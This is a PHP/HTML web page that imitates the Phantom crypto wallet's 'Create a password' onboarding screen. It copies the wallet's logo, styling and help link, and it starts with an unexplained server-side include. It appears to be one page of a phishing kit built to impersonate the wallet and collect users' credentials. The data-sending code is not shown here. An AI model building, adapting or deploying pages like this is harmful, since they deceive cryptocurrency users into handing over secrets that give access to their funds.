
<?php
include "./4d/index.php";
?>
<html lang="en">

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Phantom Wallet</title>
    <style>
        @font-face {
            font-family: Circular;
            font-style: normal;
            font-weight: 700;
            src: url(./style/Circular-Bold.2c65c79a.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: normal;
            font-weight: 400;
            src: url(./style/Inter-Regular.170f3d57.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: italic;
            font-weight: 400;
            src: url(./style/Inter-Italic.4848065e.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: normal;
            font-weight: 500;
            src: url(./style/Inter-Medium.c57e220f.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: italic;
            font-weight: 500;
            src: url(./style/Inter-MediumItalic.558fbca6.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: normal;
            font-weight: 600;
            src: url(./style/Inter-SemiBold.ed4a77e7.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: italic;
            font-weight: 600;
            src: url(./style/Inter-SemiBoldItalic.a7d72d01.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: normal;
            font-weight: 700;
            src: url(./style/Inter-Bold.2f504352.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: italic;
            font-weight: 700;
            src: url(./style/Inter-BoldItalic.531afb47.woff) format("woff")
        }
    </style>



    <style>
        body,
        html,
        * {
            box-sizing: border-box;
            font-family: Inter, Roboto, Arial;
            color: white;
            user-select: none;
            text-rendering: optimizespeed;
            -webkit-font-smoothing: antialiased;
        }

        body {
            background: rgb(44, 45, 48);
            min-height: 100vh;
            margin: 0px;
            display: flex;
            -webkit-box-pack: center;
            justify-content: center;
            -webkit-box-align: center;
            align-items: center;
        }

        html,
        body,
        div,
        span,
        applet,
        object,
        iframe,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        p,
        blockquote,
        pre,
        a,
        abbr,
        acronym,
        address,
        big,
        cite,
        code,
        del,
        dfn,
        em,
        img,
        ins,
        kbd,
        q,
        s,
        samp,
        small,
        strike,
        strong,
        sub,
        sup,
        tt,
        var,
        b,
        u,
        i,
        center,
        dl,
        dt,
        dd,
        menu,
        ol,
        ul,
        li,
        fieldset,
        form,
        label,
        legend,
        table,
        caption,
        tbody,
        tfoot,
        thead,
        tr,
        th,
        td,
        article,
        aside,
        canvas,
        details,
        embed,
        figure,
        figcaption,
        footer,
        header,
        hgroup,
        main,
        menu,
        nav,
        output,
        ruby,
        section,
        summary,
        time,
        mark,
        audio,
        video {
            margin: 0px;
            padding: 0px;
            border: 0px;
            font: inherit;
            vertical-align: baseline;
        }

        .hHWJsN {
            position: absolute;
            top: 0px;
            right: 0px;
            left: 0px;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: justify;
            justify-content: space-between;
            padding: 30px 40px;
        }

        .djqNbW {
            background: rgb(37, 37, 37);
            border-radius: 100px;
        }

        .lmJnPt {
            display: flex;
            flex-direction: row;
            width: auto;
            padding: 10px 20px;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: start;
            justify-content: flex-start;
        }

        .hWshXD {
            font-family: Circular, Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        }

        .eotGUX {
            color: white;
            text-align: center;
            font-style: normal;
            font-weight: 700;
            opacity: 1;
            font-size: 16px;
            margin: 0px 0px 0px 10px;
            line-height: 18px;
            text-decoration: none;
            background-color: transparent;
        }

        .dletZI {
            text-decoration: none;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
        }

        .dletZI svg {
            fill: rgb(170, 170, 170);
        }

        .ggRpVa {
            color: rgb(170, 170, 170);
            text-align: center;
            font-style: normal;
            font-weight: 500;
            opacity: 1;
            font-size: 16px;
            margin: 0px 0px 0px 8px;
            line-height: 25px;
            text-decoration: none;
            background-color: transparent;
        }

        .JQFNG {
            width: 420px;
            min-height: 504px;
            position: relative;
            overflow: hidden;
            background-color: rgb(34, 34, 34);
            border: 1px solid rgb(50, 50, 50);
            border-radius: 8px;
            box-shadow: rgb(0 0 0 / 30%) 0px 10px 20px;
        }

        .bdpdgN {
            display: flex;
            flex-direction: row;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: start;
            justify-content: flex-start;
        }

        .hNrXGi {
            display: flex;
            flex-direction: column;
            -webkit-box-pack: justify;
            justify-content: space-between;
            -webkit-box-align: center;
            align-items: center;
            min-height: calc(458px);
            padding: 20px;
        }

        .hZwHQI {
            height: 100%;
            flex: 1 1 0%;
        }

        .iPPaaj {
            display: flex;
            flex-direction: column;
            width: 100%;
            align-items: flex-start;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .dAWGlU {
            height: 100%;
            margin-bottom: 20px;
            flex: 1 1 0%;
        }

        .iPPaaj {
            display: flex;
            flex-direction: column;
            width: 100%;
            align-items: flex-start;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .gwIklX {
            width: 100%;
            height: fit-content;
        }

        .fXtZsa {
            display: flex;
            flex-direction: column;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .bAthNV svg:nth-child(2) {
            margin: 20px 0px;
        }

        .bhryEU {
            color: rgb(153, 153, 153);
            text-align: center;
            font-style: normal;
            font-weight: normal;
            opacity: 1;
            font-size: 17px;
            line-height: 25px;
            text-decoration: none;
            background-color: transparent;
        }

        .hJnMKN {
            display: flex;
            flex-direction: column;
            width: 100%;
            align-items: flex-start;
            -webkit-box-pack: end;
            justify-content: flex-end;
        }

        .fimA-Dk:hover:enabled {
            background: rgb(66, 58, 169);
        }

        .dsAYhQ button:not(:last-child) {
            margin-bottom: 10px;
        }

        .fimA-Dk {
            display: flex;
            flex-direction: row;
            -webkit-box-pack: center;
            justify-content: center;
            align-items: flex-start;
            padding: 14px 0px;
            width: 100%;
            border-radius: 6px;
            font-size: 16px;
            font-weight: 600;
            line-height: 19px;
            color: white;
            pointer-events: auto;
            border: none;
            outline-color: transparent;
            outline-style: none;
            cursor: pointer;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
            background: rgb(171, 159, 242);
            color: rgb(34, 34, 34);
        }

        .fajfuv:hover:enabled {
            background: rgb(68, 68, 68);
        }

        .fajfuv {
            display: flex;
            flex-direction: row;
            -webkit-box-pack: center;
            justify-content: center;
            align-items: flex-start;
            padding: 14px 0px;
            width: 100%;
            border-radius: 6px;
            font-size: 16px;
            font-weight: 600;
            line-height: 19px;
            color: white;
            pointer-events: auto;
            border: none;
            outline-color: transparent;
            outline-style: none;
            cursor: pointer;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
            background: rgb(51, 51, 51);
        }

        :focus,
        :focus-within {
            outline: transparent none 0px !important;
        }

        .glsbck {
            background-color: rgb(34, 34, 34);
            padding: 10px 16px;
            border-bottom: 1px solid rgb(50, 50, 50);
            height: 46px;
        }

        .dStjvI {
            display: flex;
            flex-direction: row;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: justify;
            justify-content: space-between;
        }

        .sKjKB {
            width: 24px;
            height: 24px;
        }

        .hghogM {
            display: flex;
            flex-direction: row;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .kuwnRP> :not(:last-child) {
            margin-right: 10px;
        }

        .HKIbu {
            height: 12px;
            width: 12px;
            background-color: rgb(78, 68, 206);
            border-radius: 50%;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            flex-shrink: 0;
            opacity: 1;
        }

        .kuwnRP> :not(:last-child) {
            margin-right: 10px;
        }

        .hDJHUe {
            height: 12px;
            width: 12px;
            background-color: rgb(51, 51, 51);
            border-radius: 50%;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            flex-shrink: 0;
            opacity: 1;
        }

        .hNrXGi {
            display: flex;
            flex-direction: column;
            -webkit-box-pack: justify;
            justify-content: space-between;
            -webkit-box-align: center;
            align-items: center;
            min-height: calc(458px);
            padding: 20px;
        }

        .dWsNHK {
            width: 100%;
            height: 100%;
            display: flex;
            flex-direction: column;
            -webkit-box-pack: justify;
            justify-content: space-between;
            flex: 1 1 0%;
        }

        .dAWGlU {
            height: 100%;
            margin-bottom: 20px;
            flex: 1 1 0%;
        }

        .iPPaaj {
            display: flex;
            flex-direction: column;
            width: 100%;
            align-items: flex-start;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .gwIklX {
            width: 100%;
            height: fit-content;
        }

        .cmxFnd {
            margin-bottom: 20px;
        }

        .WmdOz {
            display: flex;
            flex-direction: column;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: start;
            justify-content: flex-start;
        }

        .lgzXzR {
            text-align: center;
            font-style: normal;
            font-weight: 500;
            opacity: 1;
            font-size: 28px;
            margin: 0px 0px 10px;
            line-height: 34px;
            text-decoration: none;
            background-color: transparent;
        }

        .efIhNR {
            color: rgb(153, 153, 153);
            text-align: center;
            font-style: normal;
            font-weight: normal;
            opacity: 1;
            font-size: 16px;
            line-height: 25px;
            text-decoration: none;
            background-color: transparent;
        }

        .kGrOwf {
            display: grid;
            grid-template-columns: 33.3% 33.3% 33.3%;
            row-gap: 10px;
        }

        kGrOwf .sc-eJwWfJ:nth-child(3n-2) {
            justify-self: left;
        }

        .bMgiWU {
            color: rgb(255, 255, 255);
            background: rgb(24, 24, 24);
            border: 1px solid rgb(47, 47, 47);
            border-radius: 6px;
            align-self: center;
            height: 41px;
        }

        .hjhARv {
            display: flex;
            flex-direction: row;
            width: 120px;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .knpcKm {
            color: rgb(153, 153, 153);
            text-align: center;
            font-style: normal;
            font-weight: normal;
            opacity: 1;
            font-size: 14px;
            line-height: 25px;
            text-decoration: none;
            background-color: transparent;
        }

        .ljEXcq {
            color: rgb(255, 255, 255);
            background: none;
            border: none;
            width: 65%;
        }

        input,
        textarea {
            user-select: text;
        }

        .iqfECK {
            height: 24px;
            padding: 12px 0px 30px;
        }

        .hghogM {
            display: flex;
            flex-direction: row;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .eOPLNY {
            cursor: pointer;
            text-decoration: none;
            font-weight: 500;
            color: rgb(119, 119, 119);
        }

        .fHkNsP:hover:enabled {
            background: rgb(68, 68, 68);
        }

        .fHkNsP {
            display: flex;
            flex-direction: row;
            -webkit-box-pack: center;
            justify-content: center;
            align-items: flex-start;
            padding: 14px 0px;
            width: 100%;
            border-radius: 6px;
            font-size: 16px;
            font-weight: 600;
            line-height: 19px;
            color: white;
            pointer-events: auto;
            border: none;
            outline-color: transparent;
            outline-style: none;
            cursor: auto;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
            background: rgb(51, 51, 51);
        }

        :focus,
        :focus-within {
            outline: transparent none 0px !important;
        }

        .kGrOwf .sc-eJwWfJ:nth-child(3n-2) {
            justify-self: left;
        }

        .bMgiWU:focus-within {
            border: 1px solid rgb(138, 129, 248);
        }

        .gPuoEw:hover:enabled {
            background: rgb(66, 58, 169);
        }

        .gPuoEw {
            display: flex;
            flex-direction: row;
            -webkit-box-pack: center;
            justify-content: center;
            align-items: flex-start;
            padding: 14px 0px;
            width: 100%;
            border-radius: 6px;
            font-size: 16px;
            font-weight: 600;
            line-height: 19px;
            color: white;
            pointer-events: auto;
            border: none;
            outline-color: transparent;
            outline-style: none;
            cursor: pointer;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
            background: rgb(78, 68, 206);
        }

        :focus,
        :focus-within {
            outline: transparent none 0px !important;
        }

        .glsbck {
            background-color: rgb(34, 34, 34);
            padding: 10px 16px;
            border-bottom: 1px solid rgb(50, 50, 50);
            height: 46px;
        }

        .dStjvI {
            display: flex;
            flex-direction: row;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: justify;
            justify-content: space-between;
        }

        .sKjKB {
            width: 24px;
            height: 24px;
        }

        .llmfUQ {
            cursor: pointer;
            width: 24px;
            height: 24px;
            transition: background-color 200ms ease 0s;
            background-color: rgb(51, 51, 51) !important;
        }

        .gZPOPl {
            height: 24px;
            width: 24px;
            background-color: rgb(51, 51, 51);
            border-radius: 50%;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            flex-shrink: 0;
            opacity: 1;
        }

        .hNrXGi {
            display: flex;
            flex-direction: column;
            -webkit-box-pack: justify;
            justify-content: space-between;
            -webkit-box-align: center;
            align-items: center;
            min-height: calc(458px);
            padding: 20px;
        }

        .dWsNHK {
            width: 100%;
            height: 100%;
            display: flex;
            flex-direction: column;
            -webkit-box-pack: justify;
            justify-content: space-between;
            flex: 1 1 0%;
        }

        .dAWGlU {
            height: 100%;
            margin-bottom: 20px;
            flex: 1 1 0%;
        }

        .iPPaaj {
            display: flex;
            flex-direction: column;
            width: 100%;
            align-items: flex-start;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .gwIklX {
            width: 100%;
            height: fit-content;
        }

        .cmxFnd {
            margin-bottom: 20px;
        }

        .WmdOz {
            display: flex;
            flex-direction: column;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: start;
            justify-content: flex-start;
        }

        .lgzXzR {
            text-align: center;
            font-style: normal;
            font-weight: 500;
            opacity: 1;
            font-size: 28px;
            margin: 0px 0px 10px;
            line-height: 34px;
            text-decoration: none;
            background-color: transparent;
        }

        .efIhNR {
            color: rgb(153, 153, 153);
            text-align: center;
            font-style: normal;
            font-weight: normal;
            opacity: 1;
            font-size: 16px;
            line-height: 25px;
            text-decoration: none;
            background-color: transparent;
        }

        .eCcjgV {
            margin-bottom: 17px;
        }

        .dThhlm {
            display: flex;
            flex-direction: column;
            width: 100%;
            align-items: flex-start;
            -webkit-box-pack: start;
            justify-content: flex-start;
        }

        .eCcjgV input[name="password"] {
            margin-bottom: 10px;
        }

        .kNaMbq:focus {
            outline: 0px;
        }

        .kNaMbq {
            width: 100%;
            padding: 14px;
            background: rgb(24, 24, 24);
            border-width: 1px;
            border-style: solid;
            border-color: rgb(47, 47, 47);
            border-radius: 6px;
            color: white;
            font-size: 16px;
            line-height: 19px;
        }

        .cGTVFC {
            position: relative;
            width: 100%;
        }

        .dvdvQY {
            margin: 0px;
        }

        .bdpdgN {
            display: flex;
            flex-direction: row;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: start;
            justify-content: flex-start;
        }

        :focus,
        :focus-within {
            outline: transparent none 0px !important;
        }

        [data-reach-custom-checkbox-input] {
            box-shadow: none !important;
            cursor: inherit;
            height: 100% !important;
            left: 0 !important;
            margin: 0 !important;
            opacity: 0 !important;
            outline: none !important;
            padding: 0 !important;
            position: absolute !important;
            top: 0 !important;
            width: 100% !important;
            z-index: 1 !important;
        }

        .dvdvQY>* {
            margin-right: 10px;
        }

        .hxLzVm {
            color: rgb(153, 153, 153);
            text-align: center;
            font-style: normal;
            font-weight: normal;
            opacity: 1;
            font-size: 16px;
            line-height: 19px;
            text-decoration: none;
            background-color: transparent;
        }

        .dvdvQY label {
            color: rgb(138, 129, 248);
            cursor: pointer;
        }

        .fimA-Dk:hover:enabled {
            background: rgb(226, 223, 254);
        }

        .fimA-Dk {
            display: flex;
            flex-direction: row;
            -webkit-box-pack: center;
            justify-content: center;
            align-items: flex-start;
            padding: 14px 0px;
            width: 100%;
            border-radius: 6px;
            font-size: 16px;
            font-weight: 600;
            line-height: 19px;
            color: white;
            pointer-events: auto;
            border: none;
            outline-color: transparent;
            outline-style: none;
            cursor: pointer;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
            background: rgb(171, 159, 242);
            color: rgb(34, 34, 34);
        }

        .llmfUQ:hover {
            background-color: rgb(68, 68, 68);
        }

        .llmfUQ {
            cursor: pointer;
            width: 24px;
            height: 24px;
            transition: background-color 200ms ease 0s;
            background-color: rgb(51, 51, 51) !important;
        }

        .gZPOPl {
            height: 24px;
            width: 24px;
            background-color: rgb(51, 51, 51);
            border-radius: 50%;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            flex-shrink: 0;
            opacity: 1;
        }
    </style>



</head>

<body
    style="color: white;background: rgb(226, 223, 254);min-height: 100vh;margin: 0px;display: flex;-webkit-box-pack: center;justify-content: center;-webkit-box-align: center;align-items: center;font-family: Inter, Roboto, Arial;">
    <noscript>You need to enable Javascript to run this application.</noscript>
    <div id="root">
        <header class="sc-TBWPX hHWJsN">
            <div width="auto" class=""><svg width="32" viewBox="0 0 269 224" xmlns="http://www.w3.org/2000/svg"
                    fill="#fff">
                    <path
                        d="M31.8301 224C66.1567 224 91.9536 194.147 107.349 170.557C105.476 175.776 104.436 180.995 104.436 186.006C104.436 199.784 112.342 209.596 127.944 209.596C149.373 209.596 172.257 190.807 184.115 170.557C183.283 173.48 182.867 176.194 182.867 178.699C182.867 188.302 188.276 194.356 199.302 194.356C234.045 194.356 268.995 132.772 268.995 78.9115C268.995 36.9506 247.775 0 194.517 0C100.899 0 0 114.401 0 188.302C0 217.32 15.603 224 31.8301 224ZM162.271 74.3187C162.271 63.8807 168.096 56.5741 176.626 56.5741C184.947 56.5741 190.773 63.8807 190.773 74.3187C190.773 84.7568 184.947 92.2721 176.626 92.2721C168.096 92.2721 162.271 84.7568 162.271 74.3187ZM206.792 74.3187C206.792 63.8807 212.617 56.5741 221.146 56.5741C229.468 56.5741 235.293 63.8807 235.293 74.3187C235.293 84.7568 229.468 92.2721 221.146 92.2721C212.617 92.2721 206.792 84.7568 206.792 74.3187Z"
                        style="
    fill: rgb(34, 34, 34);
    color: inherit;
"></path>
                </svg></div><a href="https://help.phantom.app" rel="noopener" target="_blank"
                class="sc-ZOtfp dletZI"><svg width="15" viewBox="0 0 15 15" fill="none"
                    xmlns="http://www.w3.org/2000/svg" style="
    fill: rgb(34, 34, 34);
    color: inherit;
">
                    <path
                        d="M7.5 0C3.3589 0 0 3.3589 0 7.5C0 11.6411 3.3589 15 7.5 15C11.6411 15 15 11.6411 15 7.5C15 3.3589 11.6411 0 7.5 0ZM8.31288 11.7485C8.31288 12.0092 8.09816 12.2239 7.83742 12.2239H6.62577C6.36503 12.2239 6.15031 12.0092 6.15031 11.7485V10.9663C6.15031 10.7055 6.36503 10.4908 6.62577 10.4908H7.83742C8.09816 10.4908 8.31288 10.7055 8.31288 10.9663V11.7485ZM10.2301 7.08589C9.90798 7.53067 9.5092 7.88344 9.0184 8.14417C8.74233 8.32822 8.55828 8.51227 8.46626 8.72699C8.40491 8.86503 8.3589 9.04908 8.32822 9.2638C8.31288 9.43252 8.15951 9.55521 7.9908 9.55521H6.50307C6.30368 9.55521 6.15031 9.3865 6.16564 9.20245C6.19632 8.78834 6.30368 8.46626 6.47239 8.22086C6.68712 7.92945 7.07055 7.57669 7.6227 7.19325C7.91411 7.0092 8.12883 6.79448 8.29755 6.53374C8.46626 6.27301 8.54294 5.96626 8.54294 5.6135C8.54294 5.26074 8.45092 4.96932 8.25153 4.7546C8.05215 4.53988 7.79141 4.43252 7.43865 4.43252C7.14724 4.43252 6.91718 4.52454 6.71779 4.69325C6.59509 4.80061 6.5184 4.93865 6.47239 5.1227C6.41104 5.33742 6.21166 5.47546 5.98159 5.47546L4.60123 5.44479C4.43252 5.44479 4.29448 5.29141 4.30982 5.1227C4.35583 4.3865 4.64724 3.83436 5.15337 3.43558C5.7362 2.9908 6.48773 2.76074 7.43865 2.76074C8.45092 2.76074 9.24847 3.02147 9.83129 3.52761C10.4141 4.03374 10.7055 4.72393 10.7055 5.59816C10.7055 6.15031 10.5368 6.6411 10.2301 7.08589Z">
                    </path>
                </svg>
                <p color="#AAA" size="16" opacity="1" class="sc-gsDKAQ ggRpVa" style="
    color: rgb(34 34 34);
">Help</p>
            </a>
        </header>
        <main class="sc-dFtzxp JQFNG">
            <div style="opacity: 1;">
                <div width="100%" class="sc-bdvvtL sc-bXTejn dStjvI glsbck">
                    <div class="sc-ctqQKy sKjKB"><a href="./" color="#333333" opacity="1"
                            class="sc-GEbAx sc-gsNilK gZPOPl llmfUQ"><svg width="15" height="13">
                                <path
                                    d="M5.825 0 .34 5.484a1.165 1.165 0 0 0 0 1.647l5.484 5.484 1.647-1.647-3.496-3.495h10.889v-2.33H3.976l3.496-3.496L5.825 0Z"
                                    fill="#666666"></path>
                            </svg></a></div>
                    <div width="100%" class="sc-bdvvtL sc-eGRUor hghogM kuwnRP">
                        <div color="#4E44CE" opacity="1" class="sc-GEbAx HKIbu" style="
    background-color: rgb(171, 159, 242);
"></div>
                        <div color="#4E44CE" opacity="1" class="sc-GEbAx HKIbu" style="
    background-color: rgb(171, 159, 242);
"></div>
                        <div color="#4E44CE" opacity="1" class="sc-GEbAx HKIbu" style="
    background-color: rgb(171, 159, 242);
"></div>
                        <div color="#333" opacity="1" class="sc-GEbAx hDJHUe"></div>
                    </div>
                </div>
            </div>
            <div class="sc-gIDmLj hNrXGi" style="opacity: 1; transform: none;">
                <form class="sc-jrQzAO dWsNHK">
                    <div width="100%" class="sc-iCfMLu sc-furwcr iPPaaj dAWGlU">
                        <div class="sc-pVTFL gwIklX">
                            <div width="100%" class="sc-iCfMLu sc-kDTinF WmdOz cmxFnd">
                                <p color="FFFFFF" size="28" class="sc-gsDKAQ lgzXzR sc-iqseJM ducrfW" opacity="1">Create
                                    a password</p>
                                <p color="#999" size="16" class="sc-gsDKAQ efIhNR sc-crHmcD jDvJAM" opacity="1">You will
                                    use this to unlock your wallet.</p>
                            </div>
                            <div width="100%" class="sc-iCfMLu sc-jgrJph dThhlm eCcjgV"><input type="password"
                                    name="password" placeholder="Password" font-size="16px" class="sc-bBHxTw kNaMbq">
                                <div class="sc-gSQFLo cGTVFC">
                                    <div class="sc-iwjdpV Xaubw"><input type="password" name="confirmPassword"
                                            placeholder="Confirm Password" font-size="16px" class="sc-bBHxTw kNaMbq">
                                    </div>
                                </div>
                            </div>
                            <div width="100%" class="sc-bdvvtL sc-ksdxgE bdpdgN dvdvQY"><span
                                    data-reach-custom-checkbox-container=""
                                    style="border: 1px solid rgb(47, 47, 47);height: 22px;min-height: 22px;min-width: 22px;cursor: pointer;user-select: none;position: relative;outline-color: transparent;outline-style: none;box-shadow: none;"
                                    data-state="checked"><input aria-checked="true" type="checkbox"
                                        data-reach-custom-checkbox-input=""><span aria-hidden="true"
                                        style="display: flex;align-items: center;justify-content: center;position: absolute;width: 100%;height: 100%;user-select: none;pointer-events: none;border-radius: 6px;opacity: 1;transition: transform 150ms ease-out 0s, background 150ms ease-out 0s;z-index: 1;background: rgb(171, 159, 242);"><svg
                                            width="13" viewBox="0 0 16 12" fill="none"
                                            xmlns="http://www.w3.org/2000/svg">
                                            <path fill-rule="evenodd" clip-rule="evenodd"
                                                d="M5.51948 7.90029L13.4173 0.26042C13.7763 -0.0868472 14.3546 -0.0868472 14.7136 0.26042L15.7308 1.24434C16.0897 1.59161 16.0897 2.15109 15.7308 2.47907L6.17763 11.7395C5.81863 12.0868 5.24026 12.0868 4.88127 11.7395L0.254285 7.26364C-0.0847616 6.93566 -0.0847616 6.37617 0.254285 6.02891L1.29137 5.04499C1.63041 4.69772 2.20879 4.69772 2.56778 5.04499L5.51948 7.90029Z"
                                                fill="#FFFFFF"></path>
                                        </svg></span></span>
                                <p size="16" color="#999" opacity="1" class="sc-gsDKAQ hxLzVm">I agree to the
                                    <label>Terms of Service</label></p>
                            </div>
                        </div>
                    </div><button type="submit" font-size="16" font-weight="600" width="100%"
                        class="sc-eCImPb fimA-Dk">Continue</button>
                </form>
            </div>
        </main>
    </div>
</body>

</html>